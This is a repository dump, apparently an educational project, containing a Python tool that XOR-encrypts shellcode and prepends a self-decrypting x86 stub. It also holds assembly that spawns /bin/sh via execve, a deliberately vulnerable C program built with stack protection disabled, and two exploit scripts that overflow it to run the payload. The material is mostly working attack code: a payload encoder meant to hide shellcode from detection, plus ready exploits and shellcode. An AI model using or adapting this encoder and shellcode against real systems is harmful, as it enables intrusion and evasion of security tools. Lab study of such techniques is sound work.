├── README.md ├── ShellcodeEncrypter.py ├── encrypted_shellcode.dat ├── example ├── encrypted │ ├── Makefile │ ├── README.md │ ├── encrypted_shellcode.dat │ ├── exploit.py │ ├── shellcode │ ├── shellcode.asm │ ├── shellcode.o │ └── vulnerable ├── normal │ ├── Makefile │ ├── README.md │ ├── exploit.py │ ├── shellcode │ ├── shellcode.asm │ ├── shellcode.dat │ ├── shellcode.o │ └── vulnerable └── vulnerable │ ├── Makefile │ ├── README.md │ ├── vulnerable │ └── vulnerable.c └── shellcode.dat /README.md: -------------------------------------------------------------------------------- 1 | 简介 : 2 | ``` 3 | shellcode 加密工具 4 | ``` 5 | 使用方法 : 6 | ``` 7 | python ShellcodeEncrypter.py [SHELLCODE_FILE] [PASSWORD] 8 | ``` 9 | 原理 : 10 | ``` 11 | 1. 读取shellcode 12 | 2. 根据用户输入的 password 将 shellcode 每一个字节与 password 异或 13 | 3. 构建 shellcode 的加载器 14 | 4. 将新的 shellcode 写入新的文件 15 | ``` 16 | 注意事项 : 17 | ``` 18 | 1. 密码只可以为数字 , 范围是 0 - 255 19 | ``` 20 | 参考代码 : 21 | ``` 22 | global _start 23 | ; this shell code will xor every byte of 'encrypt' segment , then execute them 24 | ; password is 0xe9 = 233 25 | _start: 26 | jmp jocker 27 | loader: 28 | pop esi ; get address of encrypted shellcode 29 | xor ecx, ecx 30 | mov cl, 21 ; loop times (length of encrypt shellcode) 31 | decrypt: 32 | mov al, [esi] 33 | xor al, 0e9H 34 | mov [esi], al 35 | inc esi 36 | loop decrypt 37 | jmp encrypt 38 | 39 | jocker: 40 | call loader 41 | encrypt: 42 | db 0d8H 43 | db 20H 44 | db 0b8H 45 | db 81H 46 | db 0c6H 47 | db 0c6H 48 | db 9aH 49 | db 81H 50 | db 81H 51 | db 0c6H 52 | db 8bH 53 | db 80H 54 | db 87H 55 | db 60H 56 | db 0aH 57 | db 83H 58 | db 0e2H 59 | db 0b1H 60 | db 70H 61 | db 24H 62 | db 69H 63 | 64 | ``` 65 | -------------------------------------------------------------------------------- /ShellcodeEncrypter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding:utf-8 3 | 4 | import sys 5 | import binascii 6 | 7 | def encrypt(shellcode, password): 8 | result = "" 9 | for i in shellcode: 10 | result += chr(ord(i) ^ password) 11 | return result 12 | 13 | def build(shellcode, password): 14 | length = len(shellcode) 15 | result = "\xeb\x10\x5e\x31\xc9\xb1" + (chr(length)) + "\x8a\x06\x34" + chr(password) + "\x88\x06\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff" 16 | result += shellcode 17 | return result 18 | 19 | def main(): 20 | if len(sys.argv) != 3: 21 | print "Usage : " 22 | print " python ShellcodeEncrypt.py [SHELLCODE_FILE] [PASSWORD]" 23 | print "TIPS : " 24 | print " 1. password must bigger than 0 and less than 255" 25 | print "CONTACT : " 26 | print " If you have any questions, please contact me : [wangyihanger@gmail.com]" 27 | exit(1) 28 | try: 29 | filename = sys.argv[1] 30 | shellcode_file = open(filename) 31 | shellcode = shellcode_file.read() 32 | if len(shellcode) > 0xFF: 33 | print "[ERROR] : The shellcode is too long." 34 | exit(3) 35 | except: 36 | print "Open [SHELLCODE_FILE] failed." 37 | exit(2) 38 | password = int(sys.argv[2], 10) % 255 39 | print "[SHELLCODE] : " + binascii.b2a_hex(shellcode) 40 | print "[PASSWORD] : " + str(password) 41 | encrypted_shellcode = encrypt(shellcode, password) 42 | result = build(encrypted_shellcode, password) 43 | print "[ENCRYPTED] : " + binascii.b2a_hex(result) 44 | result_file = open("encrypted_" + filename, "w") 45 | result_file.write(result) 46 | result_file.close() 47 | print "[%s] Saved!" % (filename) 48 | 49 | if __name__ == "__main__": 50 | main() 51 | -------------------------------------------------------------------------------- /encrypted_shellcode.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/encrypted_shellcode.dat -------------------------------------------------------------------------------- /example/encrypted/Makefile: -------------------------------------------------------------------------------- 1 | shellcode:shellcode.o 2 | ld -o shellcode shellcode.o 3 | shellcode.o: 4 | nasm -f elf shellcode.asm 5 | clean: 6 | rm ./shellcode.o 7 | rm ./shellcode 8 | -------------------------------------------------------------------------------- /example/encrypted/README.md: -------------------------------------------------------------------------------- 1 | 简介 : 2 | ``` 3 | 使用加密后的 shellcode 溢出存在漏洞的程序 4 | ``` 5 | 环境 : 6 | ``` 7 | Linux_x86 8 | ``` 9 | -------------------------------------------------------------------------------- /example/encrypted/encrypted_shellcode.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/encrypted/encrypted_shellcode.dat -------------------------------------------------------------------------------- /example/encrypted/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding:utf-8 3 | 4 | from zio import * 5 | import binascii 6 | 7 | # objdump -d shellcode (not working) 8 | with open("./encrypted_shellcode.dat", "r") as f: 9 | shellcode = f.read() 10 | 11 | Io = zio("../vulnerable/vulnerable") 12 | 13 | # python -c 'print "A" * 8 + "BBBBCCCCDDDD" + "@@@@"' | ./vulnerable 14 | junk = "A" * 8 15 | fake = "BBBBCCCCDDDD" 16 | nop = "\x90" * 16 17 | 18 | address = l32(int(Io.readline()[2:10], 16) + len(junk) + len(fake) + 8) 19 | payload = junk + fake + address + nop + shellcode 20 | 21 | Io.write(payload) 22 | Io.interact() 23 | -------------------------------------------------------------------------------- /example/encrypted/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/encrypted/shellcode -------------------------------------------------------------------------------- /example/encrypted/shellcode.asm: -------------------------------------------------------------------------------- 1 | ; section .data 2 | ; string db '/bin//sh' 3 | ; section .text 4 | global _start 5 | _start: 6 | jmp two 7 | ; setuid 8 | ; 暂时并不需要获取 root 权限 9 | ; xor eax, eax 10 | ; mov al, 0d5H 11 | ; xor ebx, ebx 12 | ; int 80H 13 | ; execve 14 | one: 15 | pop ebx; get address of "/bin/sh" 16 | mov al, 0BH 17 | xor ecx, ecx 18 | xor edx, edx 19 | int 80H 20 | ; exit 21 | ; 我们的目的是得到一个 shell , 并不关心程序是否可以正常退出 22 | ; mov eax, 1 23 | ; mov ebx, 0 24 | ; int 80H 25 | two: 26 | call one ; push address of "/bin/sh", jmp one 27 | db '/bin/sh',0 28 | 29 | 30 | -------------------------------------------------------------------------------- /example/encrypted/shellcode.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/encrypted/shellcode.o -------------------------------------------------------------------------------- /example/encrypted/vulnerable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/encrypted/vulnerable -------------------------------------------------------------------------------- /example/normal/Makefile: -------------------------------------------------------------------------------- 1 | shellcode:shellcode.o 2 | ld -o shellcode shellcode.o 3 | shellcode.o: 4 | nasm -f elf shellcode.asm 5 | clean: 6 | rm ./shellcode.o 7 | rm ./shellcode 8 | -------------------------------------------------------------------------------- /example/normal/README.md: -------------------------------------------------------------------------------- 1 | 简介 : 2 | ``` 3 | 未加密的shellcode 4 | ``` 5 | 环境 : 6 | ``` 7 | Linux_x86 8 | ``` 9 | -------------------------------------------------------------------------------- /example/normal/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding:utf-8 3 | 4 | from zio import * 5 | import binascii 6 | 7 | # objdump -d shellcode (not working) 8 | with open("./shellcode.dat", "r") as f: 9 | shellcode = f.read() 10 | 11 | Io = zio("../vulnerable/vulnerable") 12 | 13 | # python -c 'print "A" * 8 + "BBBBCCCCDDDD" + "@@@@"' | ./vulnerable 14 | junk = "A" * 8 15 | fake = "BBBBCCCCDDDD" 16 | nop = "\x90" * 16 17 | 18 | address = l32(int(Io.readline()[2:10], 16) + len(junk) + len(fake) + 8) 19 | payload = junk + fake + address + nop + shellcode 20 | 21 | Io.write(payload) 22 | Io.interact() 23 | -------------------------------------------------------------------------------- /example/normal/shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/normal/shellcode -------------------------------------------------------------------------------- /example/normal/shellcode.asm: -------------------------------------------------------------------------------- 1 | ; section .data 2 | ; string db '/bin//sh' 3 | ; section .text 4 | global _start 5 | _start: 6 | jmp two 7 | ; setuid 8 | ; 暂时并不需要获取 root 权限 9 | ; xor eax, eax 10 | ; mov al, 0d5H 11 | ; xor ebx, ebx 12 | ; int 80H 13 | ; execve 14 | one: 15 | pop ebx; get address of "/bin/sh" 16 | mov al, 0BH 17 | xor ecx, ecx 18 | xor edx, edx 19 | int 80H 20 | ; exit 21 | ; 我们的目的是得到一个 shell , 并不关心程序是否可以正常退出 22 | ; mov eax, 1 23 | ; mov ebx, 0 24 | ; int 80H 25 | two: 26 | call one ; push address of "/bin/sh", jmp one 27 | db '/bin/sh',0 28 | 29 | 30 | -------------------------------------------------------------------------------- /example/normal/shellcode.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/normal/shellcode.dat -------------------------------------------------------------------------------- /example/normal/shellcode.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/normal/shellcode.o -------------------------------------------------------------------------------- /example/normal/vulnerable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/normal/vulnerable -------------------------------------------------------------------------------- /example/vulnerable/Makefile: -------------------------------------------------------------------------------- 1 | vulnerable:vulnerable.c 2 | gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c 3 | clean: 4 | rm ./vulnerable 5 | -------------------------------------------------------------------------------- /example/vulnerable/README.md: -------------------------------------------------------------------------------- 1 | 简介 : 2 | ``` 3 | 该程序存在缓冲区溢出漏洞 , 可以通过注入 shellcode 来执行 execve("/bin/sh") 4 | 该程序用来验证 shellcode 是否可用 5 | ``` 6 | -------------------------------------------------------------------------------- /example/vulnerable/vulnerable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/example/vulnerable/vulnerable -------------------------------------------------------------------------------- /example/vulnerable/vulnerable.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(){ 4 | char buffer[8]; 5 | printf("%p\n", &buffer); 6 | read(0, buffer, 0xFF); 7 | } 8 | -------------------------------------------------------------------------------- /shellcode.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WangYihang/XorShellcode/cf2a41888bd9bdfd24cd616f7704607f886410eb/shellcode.dat --------------------------------------------------------------------------------